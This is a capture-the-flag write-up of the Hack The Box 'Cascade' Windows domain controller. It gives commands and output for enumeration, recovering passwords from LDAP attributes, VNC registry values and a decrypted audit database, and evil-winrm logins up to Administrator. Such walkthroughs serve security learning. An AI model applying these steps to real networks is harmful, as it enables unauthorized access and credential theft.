Cascade HTB Writeup
Hello,
This is my write-up for Cascade box, which was a windows box. I had some difficulties with this since I am not that good with windows but I learned new things. Let’s dive into it.
First of all I scan for available ports using the following nmap command.
nmap -sC -sV -oA initial -Pn 10.10.10.182I get the following result:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-01 15:35:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-04-01T15:36:03
|_ start_date: 2020-04-01T14:37:26 We have few services which are relatable to active directory such as kerberos, ldap, smb.
First I will use enum4linux to get possible username and group, which information accessible from ldap.
enum4linux -a 10.10.10.182
Users:
Group 'Domain Users' (RID: 513) has member: CASCADE\administrator
Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc
Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith
Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
Group 'Domain Users' (RID: 513) has member: CASCADE\util
Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman
Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen
Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft
Groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[IT] rid:[0x459]
group:[Production] rid:[0x45a]
group:[HR] rid:[0x45b]
group:[AD Recycle Bin] rid:[0x45f]
group:[Backup] rid:[0x460]
group:[Temps] rid:[0x463]
group:[WinRMRemoteWMIUsers__] rid:[0x465]
group:[Remote Management Users] rid:[0x466]
group:[Factory] rid:[0x46c]
group:[Finance] rid:[0x46d]
group:[Audit Share] rid:[0x471]
group:[Data Share] rid:[0x472] I have a list of usernames and a list of groups. I will try with each one of these username to do a null authentication on smb port 445. But that was not the case. At this point I install and open a gui tool called jxplorer. With this tool I can inspect ldap easily. I enter the host ip and then try to find juicy info on users attributes.
User r.thompson has a attribute named CascadeLegacyPwd, and I can tell it is base64 because I see a =.
I get the password for that user.
echo -n "clk0bjVldmE=" | base64 -d
rY4n5evaLet’s use smbclient with the username and password we have, to test if we can login to smb …..
smbclient -L //10.10.10.182 -U r.thompson
Enter WORKGROUP\r.thompson's password: rY4n5eva
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup availableI try to access Audit$ but I don’t have permission to do, and then I try Data:
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient //10.10.10.182/Audit$ -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient //10.10.10.182/Data -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
13106687 blocks of size 4096. 7797938 blocks available
smb: \>
I was able to get these files from the share.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ ls
ArkAdRecycleBin.log dcdiag.log Meeting_Notes_June_2018.html 'VNC Install.reg'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ The file ArkAdRecycleBin.log contains logs from a program called Ark Ad recycle bin.
If you look closely you can see 2 objects get deleted. And the command is running as user ArkSvc. Maybe we can restore these objects?
The file dcdiag.log has inside:
Which as the header says is something related to Server diagnosis. But there was nothing I could take as good info from this file.
The other file Meeting_Notes_June_2018.html:
From this file I get the following info:
- A new server is going live on Wednesday.
- They will be using a temporary account, which will be deleted at the end of the 2018. Username is
TempAdminand the password is the same as the normal admin.
If you look at the ArkAdRecycleBin file we can see user TempAdmin get deleted and the date is 8/12/2018 which is the day after wednesday. We keep this in our mind.
The last file we see it VNC Install.reg:
This is extracted from a registry as the file extension says. Also there is Password which is in hex. I try and search more in depth for this and find out a tool which may decode the password for me. I used this tool vncpasswd.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
Cloning into 'vncpasswd.py'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (22/22), done.
remote: Total 287 (delta 10), reused 13 (delta 4), pack-reused 261
Receiving objects: 100% (287/287), 87.94 KiB | 526.00 KiB/s, done.
Resolving deltas: 100% (144/144), done.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ cd vncpasswd.py
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ ./vncpasswd.py -d -H "6bcf2a4b6e5aca0f"
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ And get the password sT333ve2 . At this point I nmap again to check if winrm is open.
kali@kali:~$ nmap -Pn -p 5985,5986 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 19:27 EDT
Nmap scan report for 10.10.10.182
Host is up (0.069s latency).
PORT STATE SERVICE
5985/tcp open wsman
5986/tcp filtered wsmans
Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
kali@kali:~$
I first try with user s.smith(name taken from enum4linux output) as this user was also seen in the Meeting_Notes_June_2018.html file.
kali@kali:~$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smithI am logged in as s.smith now and I can read the user.txt file also.
After poking around the box I can’t seem to find much. So I go back, and try to see if I can access the smb share with the credentials of the new user…
smbclient //10.10.10.182/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe A 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll A 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
13106687 blocks of size 4096. 7796325 blocks available
smb: \> I can access audit which contains a .exe with a dll which seems to be linked to it A DB folder and some others .ddl files.
Inside DB there is a file named Audit.db.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version I open the file with SQlite database browser. I find inside the Ldap Table a base64 string. I try to decode it bu nothing. This seems to belong to a user named ArkSvc. This user maybe is related to ArkAdRecycleBin as seen on the log.
By looking into the RunAudit.bat I see there is something related to the executable file.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"Maybe the password is encrypted by using the exe file we saw earlier. I am going to use AvaloniaILSpy you can also use dotPeek if you feel like switching to a windows box.
I open the executable file and try to find the main function. Because this is the function every program starts. In the main program I find some juicy staff.
There is some decryption proccess happening on password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
I also found a string there. Now I am going to load the dll file to see if I found something there also, as the Crypto.DecryptString may be reffering to the dll. I find the decryption Function inside the dll
There is also a IV key and the decryption algorithm which seems to be AES in CBC mode.
I now have the following extracted:
- Encrypted password: BQO5l5Kj9MdErXx6Q6AGOw==
- IV : 1tdyjCbY1Ix49842
- Key: c4scadek3y654321
By using this website, I get the decrypted password in base64 encoding.
kali@kali:~$ echo -n "dzNsYzBtZUZyMzFuZA==" | base64 -d
w3lc0meFr31ndI now login as the user ArkSvc and password w3lc0meFr31nd with evil-winrm. Now as the file ArkAdRecycleBin.log shows I will try to restore the deleted accounts, because these are on recyclebin right???…
I see the deleted objects:
get-adobject -filter 'objectclass -eq "user" -AND IsDeleted -eq $True' -IncludeDeletedObjects -properties IsDeleted,LastKnownParent | Format-List Name,IsDeleted,LastKnownParent,DistinguishedName
But trying to restore it does not gives me the rights to do it.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:80
+ ... ccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
+ FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
*Evil-WinRM* PS C:\Users\arksvc\Documents> After a little bit, I try and see if I can see the properties of this object, which may throw us the password as the r.thompson user did.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AMIndeed it did throw us the password:
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
which when I base64 decode it gives me the cleartext password:
baCT3r1aN00dlesI now use again evil-winrm but this time as user Administrator(Because as seen in the file Meeting_Notes_June_2018.html the TempAdmin has the same password as the admin).
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> I can obtain root.txt now.
Extra
Trying to log in as TempAdmin does not do something as this users is deleted.
I restore the object with the command Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject as user administrator and then try to login but I can’t do it. By viewing the in which Groups TempAdmin the user is not inside Remote Management user. By adding the user at that group I can login also as TempAdmin
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user TempAdmin
User name TempAdmin
Full Name TempAdmin
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 27/01/2020 04:23:08
Password expires Never
Password changeable 27/01/2020 04:23:08
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Documents> Add-LocalGroupMember -Group "Remote Management Users" -Member "TempAdmin"
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u TempAdmin -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\TempAdmin\Documents> whoami
cascade\tempadminHere are some useful links while doing this box.
Active-directory-recycle-bin